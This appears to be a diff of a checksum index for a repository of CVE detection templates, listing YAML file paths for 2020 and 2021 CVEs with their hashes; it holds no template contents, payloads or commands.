-http/cves/2021/CVE-2021-24997.yaml:b75a822ad93aff2be917d5641ad42d0cbef1700f -http/cves/2021/CVE-2021-25003.yaml:4fee49b7c973c795ce083f3ad416f2e367d649df -http/cves/2021/CVE-2021-25008.yaml:557e6918b7e5c1bac8050230fca80dc229aa724a -http/cves/2021/CVE-2021-25016.yaml:c651c885cc0a52f788c39ea0a5d9cc3a0646aff1 -http/cves/2021/CVE-2021-25028.yaml:7328a303d29f70dcb9802b96f03c7e7f45a72e9f -http/cves/2021/CVE-2021-25033.yaml:a92f9ebf47e8605f782190d6f032b0b15a552ed1 -http/cves/2021/CVE-2021-25052.yaml:be5709f80e16090f2b78613826a98dd6f01c154a -http/cves/2021/CVE-2021-25055.yaml:6da8f21033a582258253f88e5fad829712d6df47 -http/cves/2021/CVE-2021-25063.yaml:5331bd32bb920bc716aaadfa86c8352a3b1ab8fe -http/cves/2021/CVE-2021-25065.yaml:3ee634aa2ea8e603c0cce28ef8cf595c7949a456 -http/cves/2021/CVE-2021-25067.yaml:3df26a295b9913d3bb7dde616171342220201916 -http/cves/2021/CVE-2021-25074.yaml:044a57be7cee9cc354d563bbfd93b3a4db004690 -http/cves/2021/CVE-2021-25075.yaml:6401de6634ba49be8beb7aecaca878994feb31bf -http/cves/2021/CVE-2021-25078.yaml:75b564e86bd5377473229ee185200bd9afd6bd0e -http/cves/2021/CVE-2021-25079.yaml:89f734d7a563918d7c813c299a0718a4d9fee045 -http/cves/2021/CVE-2021-25085.yaml:21a5d243d8a94e75bf7d3c262f6814ca8d9b3f91 -http/cves/2021/CVE-2021-25099.yaml:f5f4cca0ae5160f4aeba6badb9213a3b9d2a0d01 -http/cves/2021/CVE-2021-25104.yaml:bcf0b840cdcfdd72b9cb2680e031fe90d8c394a4 -http/cves/2021/CVE-2021-25111.yaml:d09841ab2a11257e4d63e90f91eae1b43125d5fb -http/cves/2021/CVE-2021-25112.yaml:46a17e28daa310ce25fbfe92e39806b651ee1ba3 -http/cves/2021/CVE-2021-25114.yaml:bd869efadd39415e09d155f2a68fcbbbcc537ae9 -http/cves/2021/CVE-2021-25118.yaml:fdbf1665fb81f80845c87501e9cf3776cd574c49 -http/cves/2021/CVE-2021-25120.yaml:b4d5e47d86c1da14d294f90eb2e14df3fc2abcdd -http/cves/2021/CVE-2021-25281.yaml:7bcf3de657714d39f041baf2c61bab7dd86a56b7 -http/cves/2021/CVE-2021-25296.yaml:f700bd3fe7e40211c3d5e3eabd222e231ab887da -http/cves/2021/CVE-2021-25297.yaml:0d3c327e13a092030b6e56e34874dd47982ab90c -http/cves/2021/CVE-2021-25298.yaml:b54d08d7a9e34c3ccf08ace79784924a892fc89a -http/cves/2021/CVE-2021-25299.yaml:5df1c9abf8d8593ff67c4b9d26dc9ebd4e7dab30 -http/cves/2021/CVE-2021-25646.yaml:3a353e822cee5a5dc6efdbaa2f06fdaa87748d2c -http/cves/2021/CVE-2021-25864.yaml:3c6e7c9e2ccc689a3fe70cc06f05740317ed4455 -http/cves/2021/CVE-2021-25899.yaml:1ed3ea7c88f9a500a0cf80f38e1655758589b7ae -http/cves/2021/CVE-2021-26084.yaml:d76306d74de9e4eec88a7ac23690cd3fdc913c06 -http/cves/2021/CVE-2021-26085.yaml:3e05e137914da90b3c14e6a0833d3db902304fe0 -http/cves/2021/CVE-2021-26086.yaml:d87934729e0e29c59f1d69cbdd8119acaae686e0 -http/cves/2021/CVE-2021-26247.yaml:18e0a68a82d738a6989a1f7cf739cfcfd22c8e3e +http/cves/2020/CVE-2020-26153.yaml:8e8cb28c0e8586b6e4b405e7ff6ac6cffffc288e +http/cves/2020/CVE-2020-26214.yaml:8cc22647b07bdbf35d482a7939fa7d3e4916dfe9 +http/cves/2020/CVE-2020-26217.yaml:25e2849d749895aba147bf0ae00e78297742688b +http/cves/2020/CVE-2020-26248.yaml:f2be9d43c9f0b991ddf2a787125b2f2f3ba0cbc9 +http/cves/2020/CVE-2020-26258.yaml:92164ebfa7431a181cce804b2edbf224697017ac +http/cves/2020/CVE-2020-26413.yaml:15f1a097b94bc00f10b9ead3942731ddb8b58e8c +http/cves/2020/CVE-2020-26876.yaml:8f0f7fe820166ba458786e5baad0c63f5435d493 +http/cves/2020/CVE-2020-26919.yaml:ead6a2f1f560d6fb4d9e11d30402e963bbea7a4d +http/cves/2020/CVE-2020-26948.yaml:0e70546f5b2b9bb63dd1d4fca474a214e1222135 +http/cves/2020/CVE-2020-27191.yaml:5c35e2ba1a399a7357fd6e1b106163d5d082c407 +http/cves/2020/CVE-2020-2733.yaml:72ba0048dc16da0c9151eef4aabb90ca48d03b70 +http/cves/2020/CVE-2020-27361.yaml:cb4d6580f8e6cf7e395feb9f2fbe9b6b0174177e +http/cves/2020/CVE-2020-27467.yaml:3ae81aff04905765456c80906a6f5b5ef1730729 +http/cves/2020/CVE-2020-27481.yaml:f1c71878e48293dd92e9f616427e2811382e3214 +http/cves/2020/CVE-2020-27735.yaml:6e6c711b3ac33d23b6d43129d9c8356a7de09db5 +http/cves/2020/CVE-2020-27866.yaml:5c7e1eb2b864e827251834e28c03c1296d43e45e +http/cves/2020/CVE-2020-27982.yaml:cadede663795245cdc2b4b6f19b2aca52a2e2407 +http/cves/2020/CVE-2020-27986.yaml:0c74f1b015eb4fdbfcd934f343c06d74eb958674 +http/cves/2020/CVE-2020-28185.yaml:01481df4aac81451bd0c64b42083ceab81715494 +http/cves/2020/CVE-2020-28188.yaml:934117ad3e60bb02e26241f1d6a93e168a23e735 +http/cves/2020/CVE-2020-28208.yaml:77bd0044992e448660013a23d5101051acad36bb +http/cves/2020/CVE-2020-28351.yaml:45bbe898ccf4d7da37171d15d153d37204db6096 +http/cves/2020/CVE-2020-28871.yaml:b3072f55bfbf29b664df35f5646e795a0da72bca +http/cves/2020/CVE-2020-28976.yaml:06944b8713177ec430fe5a7389b3ae4240351f3b +http/cves/2020/CVE-2020-29164.yaml:ee29e85493a3e5a70c2b467e47194b2e6909d80d +http/cves/2020/CVE-2020-29227.yaml:decb1a663c51d46ad5433425633ae654463b2e5e +http/cves/2020/CVE-2020-29284.yaml:489d88e4b020d33193d603d884d8777d361a5e86 +http/cves/2020/CVE-2020-29395.yaml:4ef9dfa11df88b72c42d8c2ad7a18e34952eb462 +http/cves/2020/CVE-2020-29453.yaml:3fe65993d1a173a26f6863e3f11e53fffa0c148c +http/cves/2020/CVE-2020-29583.yaml:7cca584bbf143ce213f0a0cab71fa2e41c6d29e8 +http/cves/2020/CVE-2020-29597.yaml:ba9295196d6e6d921f885ea74e2bc070ff0ade97 +http/cves/2020/CVE-2020-3187.yaml:a8d50681be159dfb3d34e92239040310a6a09113 +http/cves/2020/CVE-2020-3452.yaml:0665eeaf35295e443f8e122bcf31b901f397aa70 +http/cves/2020/CVE-2020-35234.yaml:76d251ed505690ee6c7b5d0b8e5377bd4fce3c06 +http/cves/2020/CVE-2020-35338.yaml:e5921bf259384ccdf621f369245073921c3e4019 +http/cves/2020/CVE-2020-35476.yaml:ba70e2750259604caa69f5f4e1df372592c3f498 +http/cves/2020/CVE-2020-35489.yaml:f4db48a53e81659817ef691c1372a979ccbef685 +http/cves/2020/CVE-2020-35580.yaml:1ef298ee2d058bc3bd9ad6f374d6209fa0d76b38 +http/cves/2020/CVE-2020-35598.yaml:7f07e5757590f38c0c48e35e657051580437b4f6 +http/cves/2020/CVE-2020-35713.yaml:821a72323e4da8f2e87a052669b7a77632a3eaed +http/cves/2020/CVE-2020-35729.yaml:d133859c5663f51efb19f70532fad8ce1434c3f7 +http/cves/2020/CVE-2020-35736.yaml:9c41b6fa164371cc582e952889d16e951e0513f3 +http/cves/2020/CVE-2020-35749.yaml:f64a14af526ccf18ca20dfd6ad1573a3eb148811 +http/cves/2020/CVE-2020-35774.yaml:02ac84295dae923774267edbd5d64c42a568d60e +http/cves/2020/CVE-2020-3580.yaml:b3d3945bb7727d74717503224bc6daf1d71d8ddf +http/cves/2020/CVE-2020-35846.yaml:9a8244433c39fc35e01d685c58af50631ba042a8 +http/cves/2020/CVE-2020-35847.yaml:052e839bec33ce5b9ba63bdb7e256d4a0e7e60d2 +http/cves/2020/CVE-2020-35848.yaml:2ff3fad28ea26e567b6fa93197d8db2093766d41 +http/cves/2020/CVE-2020-35951.yaml:15708871b159f4910301922d55e49e924686d72a +http/cves/2020/CVE-2020-35984.yaml:7177e35ef7befd03f4d5848f9dab2d2790a8773b +http/cves/2020/CVE-2020-35985.yaml:950ef0491422fd2acff21562401d381646e43550 +http/cves/2020/CVE-2020-35986.yaml:176761c8c20b06aadfbe776dfaccf596fc0106a1 +http/cves/2020/CVE-2020-35987.yaml:021a1f3e2ece6c8ada9f2dd289112b79f9466c20 +http/cves/2020/CVE-2020-36112.yaml:96c8e79dca33644022fcc70c04adcd7d740ba49f +http/cves/2020/CVE-2020-36289.yaml:52e326844788f368293454a3fd700f0d1fa45d2b +http/cves/2020/CVE-2020-36365.yaml:751e43c5a04ffd050ea3b45011ce737e43ce4b81 +http/cves/2020/CVE-2020-36510.yaml:77b1948dc70068f51aa0c98e613aaef2f3070e3d +http/cves/2020/CVE-2020-4463.yaml:c45b0e236d5ecb016c994b4b1aa4b2cf3137ccce +http/cves/2020/CVE-2020-5191.yaml:b69c3b901be5c42fd6b9dcd7d473692bccedd804 +http/cves/2020/CVE-2020-5192.yaml:ecce06da9df0abbd609437ea0b2ee18da9356816 +http/cves/2020/CVE-2020-5284.yaml:8745bd173d8ce85dfa989fe0e7084e4ff864bdfa +http/cves/2020/CVE-2020-5307.yaml:3677fa06ddab2fd39f7e517c6b0999e12aa8e28e +http/cves/2020/CVE-2020-5405.yaml:dce33c25477db76b3cc17e3af73bd831787176c1 +http/cves/2020/CVE-2020-5410.yaml:b10b24c911404480fc45444d55a47ed7f704b0d5 +http/cves/2020/CVE-2020-5412.yaml:d0d0d4e67df4cfa55f6b34af7205a5b92798263e +http/cves/2020/CVE-2020-5775.yaml:43edd664777adb067aebad088c22193db9fccf61 +http/cves/2020/CVE-2020-5776.yaml:e1c108551cfaa31fc28ddf3e201c19132af9efef +http/cves/2020/CVE-2020-5777.yaml:638743d54977e2b578202d34df0d6f50726feece +http/cves/2020/CVE-2020-5847.yaml:508ea58f1929019239d99a36e17efe498b282865 +http/cves/2020/CVE-2020-5902.yaml:37cbe1c6bcd9da303659f491ab0a17bc1756225f +http/cves/2020/CVE-2020-6171.yaml:9bfbebc98424d513ba9b3380bdbc9875e5534e82 +http/cves/2020/CVE-2020-6207.yaml:a088de44c4197b7d2cea809d39e5273c81f88c1d +http/cves/2020/CVE-2020-6287.yaml:c7261b8f9a313879600c34bf522ae65b69108f51 +http/cves/2020/CVE-2020-6308.yaml:107ff3c870329c41484b526911f75e8034956798 +http/cves/2020/CVE-2020-6637.yaml:c8dcf04e6da6398ee6c72261e3702948eedb3349 +http/cves/2020/CVE-2020-6950.yaml:b62445b829b53e29164ff847880f7108fed1602e +http/cves/2020/CVE-2020-7107.yaml:92f626677c02e838c877d12d47024f32dd2bd7be +http/cves/2020/CVE-2020-7136.yaml:e1db52033cb9adb5118932c36c14ad87009f6080 +http/cves/2020/CVE-2020-7209.yaml:902101a2387243cb7867cfd124a6b9eeaaaee3c3 +http/cves/2020/CVE-2020-7318.yaml:461700d8d88875af3a0d0629be2a308ef1f043cd +http/cves/2020/CVE-2020-7796.yaml:06cdfc05df540579e3273e4f6997e5520405069f +http/cves/2020/CVE-2020-7943.yaml:511243dca649201e357e3cfea8769fcddd44eba8 +http/cves/2020/CVE-2020-7961.yaml:b496d1d0f044ef9a507716c03531cddeea2942e2 +http/cves/2020/CVE-2020-7980.yaml:ea66138b26108d6fb90be9895f4d7d168cfdb258 +http/cves/2020/CVE-2020-8115.yaml:bdbe83e39251638f1a8aaa156484eb7807ded8fa +http/cves/2020/CVE-2020-8163.yaml:073953cc040fcc293b9f4df7bac5e4bd270a449a +http/cves/2020/CVE-2020-8191.yaml:fb37300681b1d1ee55334b9cf0882ef1725b0a5c +http/cves/2020/CVE-2020-8193.yaml:c08d23146a10baec000cd67dbe9f2e7a5ddf545d +http/cves/2020/CVE-2020-8194.yaml:1275192bc99cc340f9be959b5d64c99e1e5956b6 +http/cves/2020/CVE-2020-8209.yaml:942ac6a66400eb174ae785c89ec4ef1ac10575bf +http/cves/2020/CVE-2020-8497.yaml:4db86d97d75ea89117e900e5db30275ca1b53c13 +http/cves/2020/CVE-2020-8512.yaml:16a23fdbd14c6550f7bb1f2ae2a0fd14f7586a07 +http/cves/2020/CVE-2020-8515.yaml:77412d17ea8d9de737ea9478497179c4027aaaba +http/cves/2020/CVE-2020-8615.yaml:e89bdbf2f652e2fc5a2f68c723b906326132a52e +http/cves/2020/CVE-2020-8641.yaml:4b79895761a2f4314fb4d081339c54925f9f18c2 +http/cves/2020/CVE-2020-8644.yaml:4ec654277d880fa6730c88244bbf8c0d4b716c02 +http/cves/2020/CVE-2020-8654.yaml:c30e0eb51124ddf2a594680244534107e4cdb501 +http/cves/2020/CVE-2020-8771.yaml:44cfe6fa2d9499bbe827f13fa1e3b403fdde627e +http/cves/2020/CVE-2020-8772.yaml:35a14b11ad411e056f27352f92855f6ec9831e7f +http/cves/2020/CVE-2020-8813.yaml:1477d0554e731b809e8b15794945e5d4df698b1b +http/cves/2020/CVE-2020-8982.yaml:66c15c0140bba1cfad9a628d04ef0d9dbc5c0f77 +http/cves/2020/CVE-2020-9036.yaml:a32f39686716cee3d2a888287cd9fa678ca659fb +http/cves/2020/CVE-2020-9043.yaml:ecfa3b1647c816f4bf0cc693cc27eaffad8c2cc7 +http/cves/2020/CVE-2020-9047.yaml:1e2762d55b698232948fab7d864ede3de87ceaf5 +http/cves/2020/CVE-2020-9054.yaml:399452e41537204471b8fa97ff320866d3da42a5 +http/cves/2020/CVE-2020-9315.yaml:e52d8339c45fbb1df534a291b975e70cd803d882 +http/cves/2020/CVE-2020-9344.yaml:749c7af3faa09d524484a60d5dbc4c84b79f0e40 +http/cves/2020/CVE-2020-9376.yaml:a2b21628089ac03224b8c89c844d9f8a05ca6efe +http/cves/2020/CVE-2020-9402.yaml:d489ce6603b7a6691de5d175ad38a5d3fe19fc71 +http/cves/2020/CVE-2020-9425.yaml:147893899f815f342af9c434c072711d87b6c9ba +http/cves/2020/CVE-2020-9483.yaml:1c68513c681251d4eeecb48dbce2d28f6ecd0909 +http/cves/2020/CVE-2020-9484.yaml:7ee5a0c4663159d6409497da48ff36b1767af03e +http/cves/2020/CVE-2020-9496.yaml:9b5e8dcea4bd423be22fbc98f1bcddf35ea06f3a +http/cves/2020/CVE-2020-9757.yaml:a88080400a3347492261350872ac40d3293ceb68 +http/cves/2021/CVE-2021-1472.yaml:f461e3b962f382042b1779c5197584caa8d14c99 +http/cves/2021/CVE-2021-1497.yaml:9f76a7811c24f20eba8ccf9ff420fc9b38802285 +http/cves/2021/CVE-2021-1498.yaml:6410abd24b66082c4952b4e3fffd79a26f78666a +http/cves/2021/CVE-2021-1499.yaml:6d51ba62c68001815234d5a3df843a935b8c304e +http/cves/2021/CVE-2021-20031.yaml:16a820a98b755c1abff9b0e5d9a74fc0fe39d9db +http/cves/2021/CVE-2021-20038.yaml:bb6202c896e8c254a96cd728ed8d6744840cb622 +http/cves/2021/CVE-2021-20090.yaml:61833632611af4822e18b0969145224cf759d345 +http/cves/2021/CVE-2021-20091.yaml:2761826c8ec3c9155c48ce74016d1a7c929565ce +http/cves/2021/CVE-2021-20092.yaml:c73cc1ef90e7913955e86ba92fb4b61ed9d15b2d +http/cves/2021/CVE-2021-20114.yaml:e9d00e2b6fc5c2c038a22cd820580aa318e141b0 +http/cves/2021/CVE-2021-20123.yaml:9fd42fed2c07d120a9c115d550316d75aeeb7fa1 +http/cves/2021/CVE-2021-20124.yaml:9a4b760044ea601b7ec80ec94f75d5a3ef84a543 +http/cves/2021/CVE-2021-20137.yaml:d3996128b05afa2270761a6d96d293e937b0d8b3 +http/cves/2021/CVE-2021-20150.yaml:1243763392b37b2c5ec2e3eaf8565b3242d5a0b3 +http/cves/2021/CVE-2021-20158.yaml:ac9878aaa3c4b682077dae4bdbe826d4bf5ed1e0 +http/cves/2021/CVE-2021-20167.yaml:c6a309660e4b3ce326b9cc69ef1f4e456e42e288 +http/cves/2021/CVE-2021-20323.yaml:f89d31ff53c3d9582c9b9794f5829e751ec270e8 +http/cves/2021/CVE-2021-20792.yaml:10c3718e74aaf32cca51175e500947775a28687a +http/cves/2021/CVE-2021-20837.yaml:258ef8b9e779a9ed2b18c1b53dee6d28e5fd541e +http/cves/2021/CVE-2021-21087.yaml:ca2f7339dc9a83a2a443af976ca69490c51c2e59 +http/cves/2021/CVE-2021-21234.yaml:b41f483cf6189beaa9e91aef0c5ec6061e528c50 +http/cves/2021/CVE-2021-21287.yaml:ce14d586d6dae6eca27050e5efc620f1e5df5310 +http/cves/2021/CVE-2021-21307.yaml:cd7b1d878ac2feb881c104feb8ed2b5b9648961f +http/cves/2021/CVE-2021-21311.yaml:b4377b31b8d1daf2d7408d997f8b3bb5cf506c95 +http/cves/2021/CVE-2021-21315.yaml:55a9d7ba27ed6dc8782196b0908dac6a61c6dc73 +http/cves/2021/CVE-2021-21345.yaml:ac784dff2d15865e152b449002704c8bb6503937 +http/cves/2021/CVE-2021-21351.yaml:b17f3289c65fad982dce09a0cedd2cd7914017ad +http/cves/2021/CVE-2021-21389.yaml:6bc4bf2c2484bc25e355c5e6a1a5a1ffbe35cf6c +http/cves/2021/CVE-2021-21402.yaml:1132a9e12814d0b599ffc79446c88d87ce95c4d8 +http/cves/2021/CVE-2021-21479.yaml:e4221075aeacd06f55f32dae9350701abc348c6c +http/cves/2021/CVE-2021-21745.yaml:263eab4d1e8579369de59ab0fe9ba0a825018206 +http/cves/2021/CVE-2021-21799.yaml:b0531d444c25a3bf3b1bfd0806dc17690d4795ca +http/cves/2021/CVE-2021-21800.yaml:e10512553a11c848a48a195fc71893e1afbd20f7 +http/cves/2021/CVE-2021-21801.yaml:51cc513b3b7b2716aa90c3981dea13497bfa7aeb +http/cves/2021/CVE-2021-21802.yaml:cbf987bbbe103305062e32fe216879f8e378877f +http/cves/2021/CVE-2021-21803.yaml:62f1e80121c4d6a2c0cb00c8bc0436ed1e9f13a9 +http/cves/2021/CVE-2021-21805.yaml:8783f272ffb74f5a67a4a949c1bf02274ae89430 +http/cves/2021/CVE-2021-21816.yaml:ce18fe70fb3df287b48ebe584defa1d9388cd77e +http/cves/2021/CVE-2021-21881.yaml:7e5092cb7b96fb0e27aad72b4ac2a6e71c16a2b0 +http/cves/2021/CVE-2021-21972.yaml:c023fdea3e85828f4ad223a38d268c4a676ec5ff +http/cves/2021/CVE-2021-21973.yaml:5b0330cf3c3af73f0291595769fc0c2f4b9f3586 +http/cves/2021/CVE-2021-21975.yaml:ebdd457e24a41d401445d66eb635d3d38cf6f6d9 +http/cves/2021/CVE-2021-21978.yaml:5e35f8286bc4b5cf627ecc8dbc40edd9ca07f3b4 +http/cves/2021/CVE-2021-21985.yaml:8e3d2444a46405ca34f8be3aade26714081203ce +http/cves/2021/CVE-2021-22005.yaml:8ce1efa9e1d59cdb82083846b956df19a5c08bef +http/cves/2021/CVE-2021-22053.yaml:46911aec29c42a5a114254b10e36275a1765e710 +http/cves/2021/CVE-2021-22054.yaml:abb135d9b1446dc864369f7c142fb0397cbfc41a +http/cves/2021/CVE-2021-22122.yaml:d801a3f491ed27a54abe8ef81073524522e69e2d +http/cves/2021/CVE-2021-22145.yaml:0552b83cfb7881765cf592656e53c01faac68801 +http/cves/2021/CVE-2021-22205.yaml:f4473e65f3a30904973d96621cc7ea275ccee535 +http/cves/2021/CVE-2021-22214.yaml:119af8fa61e00866e2dd3df04381d81fe919b2eb +http/cves/2021/CVE-2021-22502.yaml:541afff7eaf0fe791cf636acd262e877931826d2 +http/cves/2021/CVE-2021-22707.yaml:1be2a24eaaa77b8fc97e5c68b5aedb2915423f3c +http/cves/2021/CVE-2021-22873.yaml:9e43ae10478cfcc13678170f271609fee834f1f3 +http/cves/2021/CVE-2021-22911.yaml:309486773af7540446c9d0a9efe22bf9d2cf06d2 +http/cves/2021/CVE-2021-22986.yaml:cb96bea30cb915c2abb86068d0b769c887776870 +http/cves/2021/CVE-2021-23241.yaml:13e36ce2f244b4ab4d5b82fa5e202ebc92b264c4 +http/cves/2021/CVE-2021-24145.yaml:1b59129095a0861c71f620c5caaa58278a66e614 +http/cves/2021/CVE-2021-24146.yaml:959e03dd483bc4c46b8291c76e1e08913d553830 +http/cves/2021/CVE-2021-24150.yaml:78b12876e160f7e16ba0bf316bc8353f0b8f68e3 +http/cves/2021/CVE-2021-24155.yaml:01f86dd6dace86c419c6887d587e1bf5da20614e +http/cves/2021/CVE-2021-24165.yaml:10cee44843e7da5b78d31cfab981022e0a24e5ff +http/cves/2021/CVE-2021-24169.yaml:14d3352673dd05cfcb1772fad010e7f009b9a044 +http/cves/2021/CVE-2021-24176.yaml:ae9ffe0198000a90104c79dab19b174535bfc6ca +http/cves/2021/CVE-2021-24210.yaml:c29993547738dd312b7d6eaed2a5fdf01dda038b +http/cves/2021/CVE-2021-24214.yaml:27eae532144a5f3b20baf01d355e5221801ac756 +http/cves/2021/CVE-2021-24215.yaml:c1babf4e7a3fe1ec2f496c6bc0cd7c0d2a74f95c +http/cves/2021/CVE-2021-24226.yaml:063fef7d1c19094375e8c6fb84d19d5f19f92954 +http/cves/2021/CVE-2021-24227.yaml:6e6dce454651fd0f24ff716e0abb667f2056a0fd +http/cves/2021/CVE-2021-24235.yaml:b1eb9d88e3abb6535a4d3d90a27e49ec6854b267 +http/cves/2021/CVE-2021-24236.yaml:e6c3e31f23a465b0229aef896497aedd381d7cf7 +http/cves/2021/CVE-2021-24237.yaml:bd04fbbf83b915050285c25896a29a82d42892d3 +http/cves/2021/CVE-2021-24239.yaml:5140d8a6e25f4eced1cfeac234feb0114c463f54 +http/cves/2021/CVE-2021-24245.yaml:f2d899613c3ba03ea7557720a38b93cae4b927c9 +http/cves/2021/CVE-2021-24274.yaml:a175e30f4815634bef6b917549f111c761e27457 +http/cves/2021/CVE-2021-24275.yaml:43711d22ee711d0ddf163de09532fdd23ba730e3 +http/cves/2021/CVE-2021-24276.yaml:008fc1dc9bd60536a8a716f63b2d0a1c7630a4ce +http/cves/2021/CVE-2021-24278.yaml:ea274e3816f94a7145c990a15d4e7eae6d507ae0 +http/cves/2021/CVE-2021-24284.yaml:c4cf633f70a4f802f65639d935bbc6f769e4093d +http/cves/2021/CVE-2021-24285.yaml:dac93aff29c79641426aca04fc2c2c267f7a51a3 +http/cves/2021/CVE-2021-24286.yaml:76a4a11d56a432fedf66d09f2565d9acbbd42f9f +http/cves/2021/CVE-2021-24287.yaml:6706572d636f58df6ef83fa79ae6c42eccbc7f87 +http/cves/2021/CVE-2021-24288.yaml:ae40dd327c8c731934a457ae23cd6fed1bcdb1f2 +http/cves/2021/CVE-2021-24291.yaml:38a884401e2abe4f37ef83b85fd6fb55beafcd6f +http/cves/2021/CVE-2021-24298.yaml:9e300e158631e6ea7d03b4dfd8475c2e3dbc7d1d +http/cves/2021/CVE-2021-24300.yaml:045de004c5fc72b295216dad83e1119e280f57b4 +http/cves/2021/CVE-2021-24316.yaml:b8314c90eb361aba792472fab5d853c74f9c323e +http/cves/2021/CVE-2021-24320.yaml:6c41d95117bbab09deede648521600d53b00f564 +http/cves/2021/CVE-2021-24335.yaml:d4815b50af7ebba1fe0bf08685d70bb755e38013 +http/cves/2021/CVE-2021-24340.yaml:3a61dcecfda106cf83286f9844f42c9917c48ee5 +http/cves/2021/CVE-2021-24342.yaml:332816600d426856f9c8a6d3fe3f4ed4d4a7dada +http/cves/2021/CVE-2021-24347.yaml:dc84f45a45163d4c1026796c69dc0d2bfd21835c +http/cves/2021/CVE-2021-24351.yaml:d49be400dbfa0efc8d7e0ee8619e73b49f94a85f +http/cves/2021/CVE-2021-24358.yaml:66f1882b943366630ac0eba41e016ea8d641b3fd +http/cves/2021/CVE-2021-24364.yaml:6ae2589edfa7ddf874e6d8d3b324b2660dfed2f7 +http/cves/2021/CVE-2021-24370.yaml:e0858db18b4c76b304d650f58690d97e8cf99b80 +http/cves/2021/CVE-2021-24387.yaml:b5f15a3f7d5248d81ab4142d7d4c908bb15a6b1f +http/cves/2021/CVE-2021-24389.yaml:0a3585e71bb60fe3948cca721d44630491d40904 +http/cves/2021/CVE-2021-24406.yaml:94b9bd281e098d71c621c44b2e2b0f6bf6b63ac0 +http/cves/2021/CVE-2021-24407.yaml:4132a151d8ee9f1997b5751a8776f9900106a29b +http/cves/2021/CVE-2021-24409.yaml:c0ad32b7beb549a33d8b30ae5e0a177bc2ea18a7 +http/cves/2021/CVE-2021-24435.yaml:26dc5480f800be153c5103728fe7dd0773dab350 +http/cves/2021/CVE-2021-24436.yaml:09fca42271a0bbe4653fd87f20a3e0491a183adf +http/cves/2021/CVE-2021-24452.yaml:f1b8e672e0887c76490b708a4e9b79d8c460402e +http/cves/2021/CVE-2021-24472.yaml:62e2124e444d2938edfe5c8c57571a6192a97a64 +http/cves/2021/CVE-2021-24488.yaml:0d36d3ba579be4b87ecdc3776fe6c087eed9e904 +http/cves/2021/CVE-2021-24495.yaml:0202582b802ef40b1463aec58f7a084583ab0ab3 +http/cves/2021/CVE-2021-24498.yaml:50df16e964c112d50b85e3bff6791160befb0f88 +http/cves/2021/CVE-2021-24499.yaml:03ab48082c10572bb618c6b141aeef41aaa5aba9 +http/cves/2021/CVE-2021-24510.yaml:605f012c81e7102537f7ee23604e1a1a284081e9 +http/cves/2021/CVE-2021-24554.yaml:148638fc7afca9ade8d3fcb39239801491dca616 +http/cves/2021/CVE-2021-24627.yaml:5c058527317abaeb16f341a67fb3f447ed82f8d1 +http/cves/2021/CVE-2021-24647.yaml:31a1addff1a14dcbeccaad81dab964f94fb98ed0 +http/cves/2021/CVE-2021-24666.yaml:5aa575aabd30bcc98a105716372ea4890613260d +http/cves/2021/CVE-2021-24731.yaml:18d838e5a7b1cb5cb628aa194838a8d8a5f62f0e +http/cves/2021/CVE-2021-24746.yaml:881b47f9391bb31bccf69651fa48a2639e9e30d8 +http/cves/2021/CVE-2021-24750.yaml:6927fa7f647228f923a8881986fe09cc33617f59 +http/cves/2021/CVE-2021-24762.yaml:9250eefa744cf2549354e71a23b663584848b44c +http/cves/2021/CVE-2021-24791.yaml:48a9eae00e1a189557aa81f7f5b435a0414b53e5 +http/cves/2021/CVE-2021-24827.yaml:ffbc5e640a6699ae9707b51a10491e941ac8a716 +http/cves/2021/CVE-2021-24838.yaml:cd335201edb8148fd3e46ef1d3a53cf132f15f15 +http/cves/2021/CVE-2021-24862.yaml:1fa90ec0421eaf305d98af625997417e07a08e6a +http/cves/2021/CVE-2021-24875.yaml:8078a48bd533913db71567f0301adc916e0f8214 +http/cves/2021/CVE-2021-24891.yaml:23f53eb405540c1ddef80d63b132e7a731fdc272 +http/cves/2021/CVE-2021-24910.yaml:e71cac52eb3138dcc06b14337890ca3ba828b4de +http/cves/2021/CVE-2021-24915.yaml:47e4707f61657ddd48819d531c23cef9f5f08a21 +http/cves/2021/CVE-2021-24917.yaml:97790db1cb6bcec1396e6bdac076066ed259fc79 +http/cves/2021/CVE-2021-24926.yaml:f34f85fdf5eedd48105704c6321e181fc2a068a7 +http/cves/2021/CVE-2021-24931.yaml:8c80593b3baf3204f4cf0f1cc148fa1993100228 +http/cves/2021/CVE-2021-24940.yaml:0e4f8e759c445824a532cc79591c63934499255b +http/cves/2021/CVE-2021-24946.yaml:18e76dbf548add253df98f1ccc654b6126449c2a +http/cves/2021/CVE-2021-24947.yaml:1a23ed38f36740e8db561dc54deb843830dcbde8 +http/cves/2021/CVE-2021-24956.yaml:fc5c0f09f11c293936f15701fa6c214817cb5800 +http/cves/2021/CVE-2021-24970.yaml:bf3cdc28861756080658cbf2e58b1d1f599ed74b +http/cves/2021/CVE-2021-24979.yaml:ed836cb9ff83540eca2f167c1bddf7d373b66d97 +http/cves/2021/CVE-2021-24987.yaml:f24d3ee22ef59543478535e2a474dc22094e92ab +http/cves/2021/CVE-2021-24991.yaml:61f2cb2a46dded471abdff45e58936f2cff3edaf +http/cves/2021/CVE-2021-24997.yaml:452412bbf04c335034c27b46abc8151b16668856 +http/cves/2021/CVE-2021-25003.yaml:c5e2a68a2983686e9c7d0b939c04a430927e2cf9 +http/cves/2021/CVE-2021-25008.yaml:705fe6efd1afb516fed60cc3302a8d615933e0ba +http/cves/2021/CVE-2021-25016.yaml:ac70fd2fe056d485e237932d7ff9181f2b0d1fdd +http/cves/2021/CVE-2021-25028.yaml:52c1809353b747a23ea9192969e9e50289b4825b +http/cves/2021/CVE-2021-25033.yaml:e680dbb233c8664568d10d4aab7b21b414a0f6e1 +http/cves/2021/CVE-2021-25052.yaml:28991b0235d35a6ea97c2466228772a0097e1bc8 +http/cves/2021/CVE-2021-25055.yaml:2005175eaddc16a28af345443e2397fba1998fc0 +http/cves/2021/CVE-2021-25063.yaml:4fd7cc2b2394e5c46f2dd7cb3ce452aacc4ca8b7 +http/cves/2021/CVE-2021-25065.yaml:475cf6b1ca735baf30bd29e996a00cfba09b9ccc +http/cves/2021/CVE-2021-25067.yaml:a2efab7147bf149936fc2fbdee6cacd8693f0331 +http/cves/2021/CVE-2021-25074.yaml:7e7723389af3b620c5e1ad445b00744a8174f0d1 +http/cves/2021/CVE-2021-25075.yaml:304a141b6063240cb3eaebd1b81034d2b4355fbe +http/cves/2021/CVE-2021-25078.yaml:eb65c7986765ae2046011e1627490c96af8ee4dc +http/cves/2021/CVE-2021-25079.yaml:344c0f3c65291caa4fcc79dddfaf0928ee7ab8a8 